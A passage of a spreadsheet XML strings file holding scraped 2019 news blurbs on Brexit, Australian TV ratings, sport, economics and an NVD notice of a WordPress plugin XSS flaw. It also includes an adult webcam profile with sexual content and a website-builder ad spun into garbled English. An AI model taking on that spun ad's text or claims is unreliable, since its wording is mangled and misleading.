    <t>Everything from a needle to an anchor was on offer when a crowd of 200 bargain-hunters gathered at Darling Harbour for the excitement of the railways lost property sale.</t>
  </si>
  <si>
    <t>Carla Evans claimed she was dying of the disease so a charity would organise her £15,000 wedding. Read more? Click here</t>
  </si>
  <si>
    <t>STAR WARS 9 The Rise of Skywalker new scenes revealed a huge C-3PO Anakin twist as the droid opened his red eyes. See full article at Telegraph.co.uk » The post Star Wars 9 Rise of Skywalker trailer: Horrifying C-3PO Anakin twist appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Follow Kaskade behind the scenes as he closes down America’s inaugural Mysteryland at the historic site of Woodstock. TRACKLIST: 1. Kaskade (ft. Adam Klopp) – Please Say You Will 2. Kaskade vs. Patric La Funk &amp; DBN – Please Say Quick Quack More from Kaskade: Follow on Spotify: http://smarturl.it/KaskadeSpotify Official Kaskade Website: http://www.kaskademusic.com/ Like Kaskade: […] The post Kaskade | Mysteryland 2014 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>While I was convalescing, numerous people, all women, confessed they wished they were under doctor’s orders to ensure bed rest.</t>
  </si>
  <si>
    <t>U.S. home sales rose more than expected in July, boosted by lower mortgage rates and a strong labor market, signs the Federal Reserve's shift toward lower interest rates was supporting the economy.</t>
  </si>
  <si>
    <t>Based on current support levels, the shares could be stuck in their low-$30s trading range</t>
  </si>
  <si>
    <t>Via Arkansas Online: A waitress at Abuelo’s Mexican Restaurant in Rogers credits divine intervention after two regulars gave her a brand new car as a tip. Maria Elena Barragan said she had just finished serving restaurant regulars David Harrison and his wife, Shelia Harrison, on Aug. 2 when her manager told her the couple wanted […]</t>
  </si>
  <si>
    <t>A nasty blow to Steve Smith has sparked calls for protection to batsmen to become mandatory. Source: Sports Business News</t>
  </si>
  <si>
    <t>Former Vice President Joe Biden faced heavy scrutiny again during night two of the second Democratic debates in Detroit on Wednesday.</t>
  </si>
  <si>
    <t>Ohio Governor Mike DeWine proposed a "red flag" law that would take guns away from people who may harm themselves or others.</t>
  </si>
  <si>
    <t>By this time, Manzoor had been to more than 100 Springsteen concerts, and Springsteen had begun to recognize him as a superfan. (He stood out for being Pakistani, having big hair and positioning himself near the front.) On the red carpet, the singer unexpectedly spoke to Manzoor. “He said, ‘I’ve read your book, and it’s amazing,’” Chadha related. After everyone stopped hyperventilating and went home, they began slowly to work on the screenplay (Manzoor and Chadha share credit with Paul Mayeda Burges, her husband and longtime collaborator). Then Chadha went off and made her next film, the historical drama “Viceroy’s House,” putting the project on hold for a few years. “And then Brexit was happening,” she said, “and it was very ugly. The world was turning into quite a divisive place. And I said, ‘I’m going to pick up this project and I’m going to put all my frustration about the world in here.’” There was still the question of the music. In 2017, Manzoor sent an impassioned email to Springsteen, pleading his case. Springsteen said yes, and so 12 of his songs — “Badlands,” “Thunder Road” and “Hungry Heart” among them — appear in the film. The movie has particular resonance now. Anti-immigrant nationalism is again on the rise in Britain, just as it was in 1987, and race relations in the United States are increasingly ugly and violent. “Blinded by the Light” offers a nostalgic look at the sort of American values — tolerance, open-mindedness, inclusiveness, optimism — that sometimes feel like relics of another time. “The thing that is touching to me, and sad, is the role that America plays for me,” Manzoor said. “When I was 16 I truly looked to America as the promised land. I thought, ‘If it gets too bad in this country, I can just go there.’” Source link</t>
  </si>
  <si>
    <t>Dave Richard</t>
  </si>
  <si>
    <t>Dave Richard Aug 24, 2019 at 3:11 pm ET • 5 min read Get the latest insights @FantasyFootballToday Jump to Quarterback Tiers 6.0 Last year, the top-12 quarterbacks averaged 23.4 Fantasy points per game. It’s the most I’ve recorded from the No. 1 passer group EVER. Patrick Mahomes‘ season for the ages had plenty to do with that, but so too did Matt Ryan’s huge campaign, Ben Roethlisberger’s blowout bonanza and Andrew Luck’s comeback season. They all averaged over 24 Fantasy points per game. In total, nineteen quarterbacks averaged over 20 Fantasy points per game, including part-time starters like Lamar Jackson, Carson Wentz and two guys on the same team (Jameis Winston and Ryan Fitzpatrick)! More Fantasy Draft Prep The position isn’t just deep, it’s saturated. Setting a goal</t>
  </si>
  <si>
    <t>Raquel Fletcher</t>
  </si>
  <si>
    <t>Across the country, newsrooms are shrinking. Journalists are losing their jobs while their companies struggle to turn a profit. Can the government keep local news alive?</t>
  </si>
  <si>
    <t>Callum Hunter</t>
  </si>
  <si>
    <t>Bunbury’s community relief bodies have implored the South West community to give generously this Homelessness Week.</t>
  </si>
  <si>
    <t>We are looking for several long term team players to join our team at The Alley (6183 Current Drive) We are located in Currents of Windermere We are a Bubble Tea brand that focuses on quality and premium lifestyle. Our team focuses on long term relationship with our customers, colleagues and your career future. We .. Read more</t>
  </si>
  <si>
    <t>My Kinks: underwear, kisses, hugs Webcam profile: Here I get to meet interesting people from all over the world. I get to share fantasies that I wouldnt get to in my everyday life. I can be anything I want and I love sharing that with you. Favourite sex position: ALL What I do in my amateur show: A glass of wine over a nice conversation always turns out in an exciting wild video. Bring me chocolate and I will make you go crazy! What I don’t like: A guy who thinks it’s cool to make fun of other people…well it just makes you look stupid, get a life. Gallery</t>
  </si>
  <si>
    <t>Preferred Dental Clinic Near Airdrie Alberta Best Dentists in Airdrie, AB – Airdrie Dental Choice, Blunston Dental Group, Airdrie Springs Dental, North Main Family Dental, Sierra Springs Dental, Kingsview Dental, Grace Family Dental, Nose Creek Dental Centre. See more of Main Street Dental Airdrie on Facebook Log In Forgot account? or Create New Account Not Now Main Street Dental Airdrie General Dentist in Airdrie, Alberta 5 5 out of 5 stars. Prices from $50 – Enquire for a fast quote. Free consultation. Choose from 9 Dentists in Airdrie, Alberta with 12 verified patient reviews find the best one for you. See popular locations and treatments. Airdrie in Alberta is the location of this dental clinic where. #1, 704 Main Street SE, Airdrie, Alberta View Practice Hours Facebook Contact Airdrie Dental Studio Share This Page Share Tweet +1 We are always welcoming new patients to join our big family! Contact Airdrie Dental Studio and we will be happy to answer. See more of Airdrie Dental Choice on Facebook Log In Forgot account? or Create New Account Not Now Airdrie Dental Choice General Dentist in Airdrie, Alberta 5 5 out of 5 stars. Closed Now Community See All 213 people like this 226 people follow this About. Contact our Airdrie dental office to schedule your appointment. We will be happy to assist you and your family and treat your dental conditions. Sonata Dental Clinic 2926 Main Street SE, Unit 121, Airdrie, Alberta T4B 3G4 Phone: 403-980-8898 Office Hours: Most Popular Dentist Near Airdrie Preferred Dentist Near Airdrie Alberta Dentist Near Me Free Dental Consultation Dental Fee Guide Form New Patient Form Adult New Patient Form Child Contact Us Blogs Dental Implants Dental Implants in West Airdrie You might think that a gap in Number 1 Dentist In Airdrie Alberta Dentist Phone number: +1 403-948-7377 Province: Alberta City: Airdrie Address: 216 Main St NE, Airdrie, AB T4B 0R6, Canada, Airdrie, Alberta, T4B 0R6. Similar, but featuring restaurants from across the province is Alberta on the Plate, a new festival that</t>
  </si>
  <si>
    <t>– Icepop San Francisco Shelter Volunteer Finds Homes For Thousands Of Senior Dog Sunday 25 August 2019 11:29 AM UTC-05 | Tags: activism animal-rescue-stories animal-shelter dogs featured impact pets In the late 1990s, Sherri Franklin’s love for animals led her to volunteer as a dog walker at her local SPCA. Though she was asked to give her time to the San Francisco-area shelter just once a week, she soon started showing up almost daily in order to spend more time with her furry charges. It didn’t take long for Franklin to notice that senior pups were being bypassed in favor of younger dogs. Compounding the problem was the fact that older dogs were more likely to have minor health issues, ones that would not resolve easily in a stressful shelter environment. Franklin was heartbroken that many of the older dogs she had bonded with would be euthanized before finding a home, but she wasn’t sure what to do about it. Determined to help all dogs have better lives, she began working on community policies that would have widespread impact. After she was elected vice-chair of the San Francisco Commission of Animal Control and Welfare in 2002, she spearheaded the so-called “backyard dog ordinance” that enforced minimum requirements for care of tethered dogs. Finding Loving Homes With all of her good works in the community, Franklin was still bothered by what she saw in the shelter’s cramped cages day in and day out. She thought about leaving her volunteer post altogether, so as not to experience the sadness it brought her. Realizing it was time to take radical steps to save those special dogs, in 2007 Franklin began bringing them home, rescuing 27 by herself in just one year. By 2008, Franklin had a full-fledged rescue operation on her hands. She founded Muttville, a nonprofit organization specifically devoted to the problem of older dogs languishing in shelters. In its early days, Muttville served solely in the San Francisco Bay area, winning multiple community awards for its mission. However, within a few years, Muttville went national, connecting aging mutts with forever homes across the country. Muttville now operates out of a devoted, cage-free space, after moving from Franklin’s home in 2012. With hundreds of volunteers and foster homes on hand, by the end of 2018, Muttville had placed more than 6000 senior dogs with new families! Life In Their Years Muttville’s mission is simple: Find homes for dogs that have fewer years but plenty of love left to give. Dogs are placed with foster families while they await veterinary and social assessments so that they do not have to spend their days in cages. Two of Muttville’s signature programs are their dog hospice and their Seniors for Seniors initiative. According to Petfinder.com, a dog may be considered senior as early as five years, depending on the breed. While Muttville strives to find permanent homes for all dogs, some may be so medically fragile they have only weeks or months to live. In those cases, volunteers bring these animals home to care for them and keep them comfortable until euthanasia is the only remaining option. Muttville finances all treatment costs for hospice dogs. The popular Seniors for Seniors program connects senior pups with senior citizens in two ways. For seniors over 62 who wish to adopt a senior dog, Muttville waives the adoption fee and provides necessary supplies for the first month of the match. The second option is one on one time with senior dogs at the organization’s headquarters, where senior citizens can enjoy canine companionship without some of the worries of dog ownership. According to Muttville.com, animal rescues all over the country have implemented the model Franklin has put into place with her team of fellow dog lovers. In short, there’s no telling how many senior dogs have had life added to their years through Franklin’s determination and love. Tags: activism animal-rescue-stories animal-shelter dogs featured impact pets</t>
  </si>
  <si>
    <t>Report: Daily Free-to-Air Share Channels: All Free-to-Air Channels Market: 5 City Metro (aggregate figure) Demographics: Total People Day-part: 18:00 – 24:00 Day: Tuesday Deliverable: Overnight, Consolidated 7 and Consolidated 28 Channel Overnight Consolidated 7 Consolidated 28 06/08/2019 30/07/2019 09/07/2019 ABC 10.9% 10.2% 8.2% ABC KIDS/COMEDY 2.7% 2.6% 3.1% ABC ME 0.8% 0.6% 0.5% ABC NEWS 1.3% 1.1% 0.9% ABC Network 15.7% 14.5% 12.7% Seven 18.0% 22.7% 18.3% 7TWO 2.2% 2.2% 3.8% 7mate 3.6% 3.6% 4.0% 7flix 1.7% 2.3% 2.4% 7food network 0.6% 0.5% 0.7% Seven Network 26.1% 31.3% 29.0% Nine 22.6% 20.6% 21.9% 9GO! 2.7% 2.6% 3.3% 9Gem 3.0% 2.7% 2.9% 9Life 1.8% 1.9% 1.9% Nine Network 30.2% 27.8% 30.1% 10 13.9% 13.0% 11.6% 10 Bold 3.6% 3.6% 3.8% 10 Peach 2.2% 1.9% 2.9% Network 10 19.7% 18.5% 18.3% SBS 4.8% 4.6% 6.3% SBS VICELAND 1.4% 1.5% 1.5% SBS Food 1.3% 1.1% 0.8% NITV 0.2% 0.1% 0.2% SBS World Movies 0.7% 0.6% 1.2% SBS Network 8.3% 7.9% 9.9% Report: Top 20 Programs Channels: All Free-to-Air Market: 5 City Metro (aggregate figure), Sydney, Melbourne, Brisbane, Adelaide &amp; Perth Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 06/08/2019 Deliverable: Overnight Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 SEVEN NEWS Seven Network 1,029,000 257,000 256,000 210,000 127,000 179,000 2 SEVEN NEWS / TODAY TONIGHT Seven Network 985,000 259,000 257,000 214,000 108,000 147,000 3 NINE NEWS 6:30 Nine 941,000 304,000 284,000 206,000 74,000 72,000 4 NINE NEWS Nine 935,000 304,000 280,000 210,000 72,000 69,000 5 THE BLOCK -TUE Nine 876,000 278,000 277,000 178,000 76,000 67,000 6 SEACHANGE Nine 787,000 196,000 291,000 152,000 76,000 71,000 7 A CURRENT AFFAIR Nine 726,000 257,000 194,000 151,000 58,000 65,000 8 AUSTRALIAN SURVIVOR TUES Network 10 723,000 186,000 253,000 139,000 52,000 92,000 9 ABC NEWS-EV ABC 691,000 178,000 232,000 94,000 82,000 104,000 10 HOME AND AWAY Seven Network 660,000 186,000 154,000 162,000 70,000 87,000 11 THE CHASE AUSTRALIA Seven Network 591,000 146,000 179,000 121,000 69,000 76,000 12 DOGS BEHAVING (VERY) BADLY Seven Network 558,000 150,000 160,000 98,000 66,000 84,000 13 7.30-EV ABC 548,000 146,000 165,000 90,000 64,000 82,000 14 THE PROJECT 7PM Network 10 530,000 131,000 184,000 103,000 40,000 72,000 15 HOT SEAT Nine 508,000 172,000 163,000 107,000 32,000 35,000 16 FOREIGN CORRESPONDENT-EV ABC 424,000 121,000 131,000 59,000 53,000 60,000 17 ANDREW DENTON: INTERVIEW Seven Network 414,000 108,000 116,000 79,000 38,000 73,000 18 10 NEWS FIRST Network 10 412,000 103,000 107,000 95,000 49,000 58,000 19 THE CHASE AUSTRALIA-5PM Seven Network 354,000 99,000 104,000 68,000 40,000 42,000 20 WALTZING THE DRAGON WITH BENJAMIN LAW-EV ABC 327,000 97,000 98,000 55,000 42,000 36,000 Report: Top 20 Programs Channels: All free-to-air Multi Channels Market: 5 City Metro (aggregate figure), Sydney, Melbourne, Brisbane, Adelaide &amp; Perth Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 06/08/2019 Deliverable: Overnight Rank Description (grouped) Channel\Market (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 BLUEY-AM ABCKIDS/COMEDY 182,000 52,000 41,000 40,000 31,000 18,000 2 OUTBACK TRUCKERS-PM 7mate 162,000 44,000 47,000 32,000 19,000 21,000 3 NCIS RPT 10 Bold 150,000 55,000 27,000 30,000 12,000 27,000 4 GO JETTERS-EV ABCKIDS/COMEDY 147,000 31,000 34,000 56,000 15,000 11,000 5 DINOSAUR TRAIN-EV ABCKIDS/COMEDY 146,000 40,000 32,000 37,000 17,000 21,000 6 RUSTY RIVETS-EV ABCKIDS/COMEDY 144,000 39,000 34,000 32,000 14,000 26,000 7 FLOOGALS-EV ABCKIDS/COMEDY 144,000 37,000 33,000 39,000 19,000 14,000 8 CSI: MIAMI 10 Bold 140,000 44,000 29,000 22,000 18,000 27,000 9 DEATH IN PARADISE -EV 9Gem 135,000 32,000 33,000 21,000 23,000 26,000 10 KIRI AND LOU-PM ABCKIDS/COMEDY 135,000 33,000 28,000 41,000 15,000 17,000 11 PEPPA PIG-AM ABCKIDS/COMEDY 134,000 43,000 25,000 31,000 24,000 12,000 12 BEN AND HOLLY’S LITTLE KINGDOM-AM ABCKIDS/COMEDY 128,000 41,000 37,000 15,000 24,000 11,000 13 FIREMAN SAM-AM ABCKIDS/COMEDY 127,000 32,000 25,000 40,000 20,000 10,000 14 NEIGHBOURS 10 Peach 126,000 27,000 40,000 28,000 17,000 14,000 15 HIGHWAY PATROL-EP.2 PM 7mate 124,000 24,000 41,000 29,000 13,000 17,000 16 ANDY’S PREHISTORIC ADVENTURES-EV ABCKIDS/COMEDY 123,000 34,000 32,000 17,000 14,000 26,000 17 PEPPA PIG-PM ABCKIDS/COMEDY 120,000 34,000 24,000 28,000 18,000 16,000 18 CSI: MIAMI EP 2 10 Bold 118,000 29,000 37,000 16,000 16,000 21,000 19 KIDDETS-AM ABCKIDS/COMEDY 116,000 33,000 24,000 27,000 23,000 9,000 20 SPICKS AND SPECKS-EV ABCKIDS/COMEDY 114,000 17,000 40,000 24,000 8,000 24,000 Free to Air: 25-54 demographics (Overnight) Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 THE BLOCK -TUE Nine 449,000 138,000 142,000 100,000 39,000 29,000 2 AUSTRALIAN SURVIVOR TUES Network 10 407,000 110,000 121,000 85,000 30,000 62,000 3 NINE NEWS Nine 301,000 106,000 84,000 73,000 21,000 17,000 4 NINE NEWS 6:30 Nine 298,000 105,000 81,000 71,000 20,000 21,000 5 SEACHANGE Nine 298,000 65,000 115,000 67,000 31,000 19,000 Free to Air: 18-49 demographics (Overnight) Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 THE BLOCK -TUE Nine 403,000 115,000 136,000 91,000 32,000 28,000 2 AUSTRALIAN SURVIVOR TUES Network 10 382,000 100,000 123,000 79,000 26,000 55,000 3 THE PROJECT 7PM Network 10 259,000 68,000 87,000 48,000 23,000 33,000 4 SEACHANGE Nine 248,000 46,000 104,000 60,000 22,000 16,000 5 NINE NEWS Nine 240,000 81,000 72,000 54,000 20,000 13,000 Free to Air: 16-39 demographics (Overnight) Rank Description (grouped) Channel\Network (r) 5 City Metro Sydney Melbourne Brisbane Adelaide Perth 1 AUSTRALIAN SURVIVOR TUES Network 10 245,000 61,000 86,000 48,000 16,000 34,000 2 THE BLOCK -TUE Nine 226,000 71,000 74,000 44,000 21,000 16,000 3 THE PROJECT 7PM Network 10 138,000 34,000 53,000 23,000 14,000 14,000 4 SEACHANGE Nine 136,000 28,000 59,000 30,000 11,000 7,000 5 SEVEN NEWS / TODAY TONIGHT Seven Network 126,000 35,000 34,000 35,000 8,000 15,000 Report: Top 20 Programs Channels: All Subscription Channels Market: National STV Demographics: Total People Day-part: 02:00 – 26:00 Day: Tuesday Date: 06/08/2019 Deliverable: Overnight Rank Description Channel\Market (r) National STV 1 PAUL MURRAY LIVE Sky News Live 76,000 2 JONES &amp; CREDLIN Sky News Live 59,000 3 CREDLIN Sky News Live 58,000 4 LIVE: AFL 360 FOX FOOTY 55,000 5 FAMILY GUY FOX8 53,000 6 THE BOLT REPORT Sky News Live 47,000 7 THE SIMPSONS FOX8 47,000 8 FAMILY GUY FOX8 45,000 9 LIVE: THE BACK PAGE FOX SPORTS 503 44,000 10 LIVE: NRL 360 FOX LEAGUE 43,000 11 BLUE BLOODS TVH!TS 43,000 12 AMERICAN DAD! FOX8 36,000 13 THE SIMPSONS FOX8 34,000 14 AMERICAN DAD! FOX8 33,000 15 BORDER SECURITY: INTERNATIONAL FOX8 33,000 16 THE SIMPSONS FOX8 32,000 17 SHIMMER AND SHINE Nick Jr. 31,000 18 PAW PATROL Nick Jr. 31,000 19 NCIS TVH!TS 31,000 20 SPEERS Sky News Live 30,000 © OzTAM Pty Limited 2019. The Data may not be reproduced, published or communicated (electronically or in hard copy) without the prior written consent of OzTAM. Program performance and ranking information subject to change when not based on final program logs. Ranking information is for individual episodes. Includes Preliminary data.</t>
  </si>
  <si>
    <t>Canadian comedian Sugar Sammy joins Tom Power live in the q studio to talk about how he generates laughs — and outrage — across cultural boundaries.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190812/p20#a190812p20 French regulators approve a plan by the country’s heavyweight broadcasters to launch Salto, a joint streaming service expected in Q1 2020, to battle Netflix (Stewart Clarke/Variety) Stewart Clarke / Variety: French regulators approve a plan by the country’s heavyweight broadcasters to launch Salto, a joint streaming service expected in Q1 2020, to battle Netflix — Amazon and Netflix are soon to get some Gallic competition from Team France. French regulators gave the green light Monday to plans … Source: http://www.techmeme.com/190812/p20#a190812p20 The post French regulators approve a plan by the country’s heavyweight broadcasters to launch Salto, a joint streaming service expected in Q1 2020, to battle Netflix (Stewart Clarke/Variety) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Given investor bets on large-scale rate cuts and the unrelenting pressure from Donald Trump, the Fed chair is about to deliver what could be a pivotal speech for financial markets.</t>
  </si>
  <si>
    <t>Leaked Brexit documents show worst-case scenario – minister Original Source FILE PHOTO: Britain’s Chancellor of the Duchy of Lancaster Michael Gove appears to make a statement at Downing Street in London, Britain, August 6, 2019. REUTERS/Peter Nicholls LONDON (Reuters) – Leaked British government documents warning of the impact of a no-deal Brexit are based on a worst-case scenario, said Michael Gove, the minister in charge of coordinating preparations for leaving the European Union without a deal. The official documents on a project titled “Yellowhammer” show that Britain will face shortages of fuel, food and medicine if it leaves the EU without a transition deal, jamming ports and requiring a hard border in Ireland, the Sunday Times reported. “Yellowhammer is a worst-case scenario – v significant steps have been taken in the last 3 weeks to accelerate Brexit planning,” Gove wrote on Twitter. Reporting by William James; Editing by David Goodman Our Standards:The Thomson Reuters Trust Principles.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Leaked Brexit documents show worst-case scenario – minister appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Senior government ministers remain torn over a bill to decriminalise abortion in NSW, as MPs prepare to debate the reforms.</t>
  </si>
  <si>
    <t>Darren Snowdon</t>
  </si>
  <si>
    <t>Sunshine Coast Lightning are in the box seat for a third-straight Super Netball title while Collingwood Magpies set up local derby elimination final</t>
  </si>
  <si>
    <t>A trove of documents filed in the court case shed new light on an ASIC investigation into Tennis Australia over the 2013 Australian Open broadcast rights.</t>
  </si>
  <si>
    <t>Getting paid to travel to Japan ft. Pat Kay – 529 Podcast The post Getting paid to travel to Japan ft. Pat Kay – 529 Podcast appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>All you need to get online today. 25%OFF! Key Features Templates Tech Specs Develop Your Very Own Internet Site: Mobile Phone &amp; Desktop It is possible to select from 165 Premium that is fully customizable responsive, all of these are created to work and appearance great on all devices, from cell phones to pills to desktops. It is easy to use: simply include your very own content and hit publish https://www.websitebuilderexpert.net/! You are able to modify the template based on your preferences, utilizing pictures, text, color and much more because of the easy drag ‘n’ fall tool. Web site Building at Its Most Readily Useful Make use of our drag ‘n’ drop tool to effortlessly modify your website that is new the requirement of coding. Our builder that is website tool made with users in your mind to possess your website installed and operating within a couple of ticks. But, should you like to modify the rule, our online Website Builder lets you do exactly that. Internet Site Builder Summary: Include wonderful features to Your Website Or BlogAdd features such as for instance social networking sharing buttons, PayPal re re payment options and PDF download facility to your customized web web site or certainly one of our templates that are professional. Smart Responsive EditorUse your phone, desktop or tablet to build the website of one’s ambitions. All that’s necessary is a connection that is internet our Responsive Editor, and off you choose to go. 24/7 Customer SupportNo matter just how big or little your question, we have been right right here to simply help 24/7. Utilize our chat that is live or submit a support solution anytime. We likewise have a knowledgebase that is extensive one to browse. Why Is Our Online Builder Great? Please click the pictures below to enlarge and scroll through gallery Bing Optimized Effortlessly Search Engine Optimization Optimize your website’s options for name, key words and much more. Social Media Marketing Integration Hook up to your world that is social via Media Widgets : Twitter / Twitter / LinkedIn Personal / LinkedIn Business / Yelp Reviews brand NEW SSL Help Built In Secure an SSL certificate to your website. Business and Company Unlimited packages consist of an SSL certificate that also improves SEO. NEW Developer Mode Edit the HTML and CSS rule of one’s internet site effortlessly, while making the modifications you wish to produce an unique site. On Line Picture Image Editor just Take an image along with your smartphone, upload it and simply edit with your Image Editor. No significance of additional software programs. Effortless Twitter Image Import Connect with your Facebook account and upload your favorite pictures immediately! Extra Features It is simple to include exciting widgets such as for instance image galleries, slideshows, YouTube Videos, Bing Maps, SoundCloud clips and e-mail kinds. Additionally connect Dropbox and PDF uploads to your internet website. Paypal Purchase Now Button Offer services and products having a protected paypal purchase Now key. Affordable Our web site Builder makes creating a web site less expensive than using a design solution. It’s a win-win situation to balance professional design to your investment. Bing Analytics Just add your Google Analytics number that is tracking begin accessing all your web site data. Domain Included Every Website Builder package is sold with a totally free domain name*, e-mail account and website hosting: all you need to get online. Complete Control Function as the master of your personal web site insurance firms control that is full all times. Select Your Package Latest Provides – Save 25% Includes Domain name + Web Hosting 1 x 10GB email NEW Responsive Editor brand NEW 165 Expert Design Templates NEW Developer Mode Build as much as a 10 web web Page internet site 250MB Storage Space 30-day money-back guarantee Latest Offers – Save 25% Includes Domain name + Internet Hosting 1000 x 10GB e-mail addresses NEW Responsive Editor brand NEW 165 Pro Design Templates NEW Developer Mode Build as much as a 100 web web Page web site Unmetered Storage Space NEW SSL Certification for Protection Offer products with PayPal Purchase Now Button 30-day guarantee that is money-back Unlimited Company Latest Provides – Save 25% Includes Domain name + Internet Hosting 1000 x 10GB e-mail addresses NEW Responsive Editor brand NEW 165 Expert Design Templates brand brand brand NEW Developer Mode Build as much as a 1000 web web web Page internet site Unmetered Storage NEW SSL Certification for Safety Incorporated Ecommece Features Accept Credit / Debit Card / PayPal Re Re Re Payments Unlimited Ecommerce Products Offer products with PayPal Purchase Now Button 30-day money-back guarantee = unmetered to your maximum ability of this equipment Faq’s Internet site builders facilitate the creation of internet sites with no need for coding. Our easy-to-use drag ‘n’ fall feature makes site building instinctive: you can easily go modules around, add text, pictures and even produce a shop that is online. Begin by choosing the template which you are able to then modify to your style. Once you’re ready, hit “publish” and your website will get reside! All of our templates are completely responsive, meaning they’ll appearance good and work effectively on all products tablets that are including smart phones. Features available on our Website Builder consist of e commerce, integration/sharing functions for Facebook, Twitter, YouTube, and much more. No! Our online web builder is sold with the inspiration you’re looking for to obtain your web page: a domain that is free, website hosting and customized e-mail. Dependent on which package you decide on, internet site creation with WestHost can also add Search Engine Optimization administration and limitless storage space. The clear answer is none! Create your website that is own intuitively! Nevertheless, if you want to code straight, you are able to access the HTML and CSS of one’s web web web site. Then your website builder and hosting account should be up and running within minutes if your domain name is registered with WestHost. Then please allow up to a few days for everything to be in place if, however, you need us to transfer a domain from another provider, or even wish to migrate your existing site to WestHost. It is simple to update your package. Simply log into the account and select the package you want as being a creator that is website. Our support that is expert team available 1 week per week, 24/7 so don’t hesitate to get hold of us in the event that you need help with your online internet site builder whenever you want. You may check always our knowledgebase that is filled with helpful information, or contact all of us right right right here.</t>
  </si>
  <si>
    <t>The all-in-one-wp-security-and-firewall plugin before 3.9.5 for WordPress has XSS in add_query_arg and remove_query_arg function instances. Published at: August 13, 2019 at 06:15PM View on NVD website The post New vulnerability on the NVD: CVE-2015-9294 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Vertex is accused of raking in vast profits while making Orkambi unaffordable to NHS A US company, which is refusing to drop its price for the life-changing cystic fibrosis drug Orkambi to make it affordable to NHS England, is set to make $21bn (£17bn) in profit from that and a sister medicine, according to research.Countries around the world are struggling to pay for Orkambi, made by Vertex, which has a list price of £104,000 per patient per year and is not a cure. The National Institute of Health and Care Excellence (Nice) in England has said it is not cost effective. On Monday, the Scottish Medicines Consortium will decide whether to approve the drug for children. Continue reading… Read More</t>
  </si>
  <si>
    <t>The result of the Arsenal game went as I expected – a defeat. It wasn’t a classic, but I would argue that the first half was more enjoyable to watch than the 11 behind the ball tactics adopted by Rafa Benitez. The issue was our failure to build on that steady first half and the mix up at the back that lead to their avoidable goal, but we more than held our own and a draw would have been a fair result. I acknowledge this was our first game, but for me many of the players didn’t look match fit. Matt Richie will run all day (although he was a bit ragged yesterday) and Hayden was our outstanding player, but many appeared to be struggling with fitness in the second half. The question I ask myself is; Would a Rafa team have got a point in this fixture? I think it would, and that’s why I think we will struggle under Steve Bruce’s guidance. People will say ‘but Rafa lost three of his four PL games vs Arsenal’, but our home defeat to the Gunners this time last season saw them field a MUCH stronger starting 11. It’s fair to say they were as weak as they’re going to be all season on Sunday. We may well find the style of play more enjoyable this season, with TV pundits applauding our efforts, instead of being scathing at what they saw as negative tactics. But we may also pay the price. This is the dilemma, he has a team that look capable of causing teams real problems on paper, but he must find the balance and a system that works at both ends. I noted Lee Charley’s comments in the match day programme, acknowledging the need to improve the clubs dialogue with supporters. It’s only taken 10 years, so I don’t hold the slightest hope for any change there. Arsenal are a top club and player for player have more quality than the Toon. Whilst the defeat was disappointing and the second half display was deflating, I will judge our potential at Norwich City next weekend. That is the true test of where we’re really at. Come on Steve, you need to be more than a manager. You need to get the best from the team, be an ambassador for the club (on and off the pitch) and you must win over the Toon faithful. Good Luck! (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>The IMF, in an updated economic outlook, projected the global economy would expand by 3% this year, the weakest in a decade.</t>
  </si>
  <si>
    <t>The Morrison government has dismissed international calls for a dramatic policy shift on climate change despite new warnings its will not meet its commitments.</t>
  </si>
  <si>
    <t>When voice came over the ship's public-address system announcing that weather would prevent it from making yet another stop, "that's when the riots broke out," a passenger said.</t>
  </si>
  <si>
    <t>SBS managing director James Taylor is set to call on the media industry to avoid a "tick box" approach to diversity and instead look at genuine efforts to tell the stories of a multicultural country.</t>
  </si>
  <si>
    <t>Medical personnel in Kashmir say preventable deaths are happening because of blocked streets, medicine shortages, and a phone and internet blockade by India. Source link</t>
  </si>
  <si>
    <t>Felicity Ogilvie</t>
  </si>
  <si>
    <t>Bek Eirth's insistence on keeping her dog Dexter ended in her eviction — but with some help her dog has been her saviour.</t>
  </si>
  <si>
    <t>The economy is improving but with little momentum, warns Deloitte Acess, while also expressing concern about future housing costs.</t>
  </si>
  <si>
    <t>Jacinta Barnett was in a Mazda 3, with three other teenagers, when the car collided with a Nissan Skyline about 8pm on Sunday.</t>
  </si>
  <si>
    <t>Stan has announced the final season of Will &amp; Grace will be fast-tracked later this month. Starring Debra Messing, Eric McCormack, Sean Hayes and Megan Mullally, it will begin 25 October, the same day as the US. Comprising 18 episodes, this will run into 2020. Executive producers Max Mutchnick, David Kohan and James Burrows: “We think of the Will &amp; Grace reboot episodes the way Karen Walker thinks of martinis – 51 is not enough, 53 is too many. That is why, after consulting with the cast, we all have decided this will be the final season of Will &amp; Grace. “In 2016, Bob Greenblatt came to us with the idea of doing a 10-episode reboot of Will &amp; Grace. They say you can’t go home again, but we did. And now, three seasons and 52 episodes later, we’re even more proud of something we never thought we’d get a chance to do again. We have had a once-in-a-lifetime experience twice. And for that, we owe a double debt of gratitude to NBC, this show’s supportive and caring home since day one.” “It’s been the highlight of our careers to write for and direct four incredible artists who we consider to be the finest and funniest ensemble sitcom cast of all time – Eric McCormack, Debra Messing, Megan Mullally, and Sean Hayes. “Of course, actors as brilliant as these four are only as good as the words they’re given. The ‘Will &amp; Grace’ writing room has been a dream team that has consistently lifted the show to heights we never could have achieved on our own with their collective humour, warmth, and humanity. “The hardest part about making this decision is saying goodbye to our outstanding production team and crew who, over two decades, brought passion and artistry to every department. If we had just one more season, we would have learned their names. So, thank you Handlebar Mustache, Cheese Lady, and Cargo Shorts #1 – #12. We will always think of you as family. “And finally, our deepest gratitude goes to each and every Will &amp; Grace fan across the world. It was a privilege to make 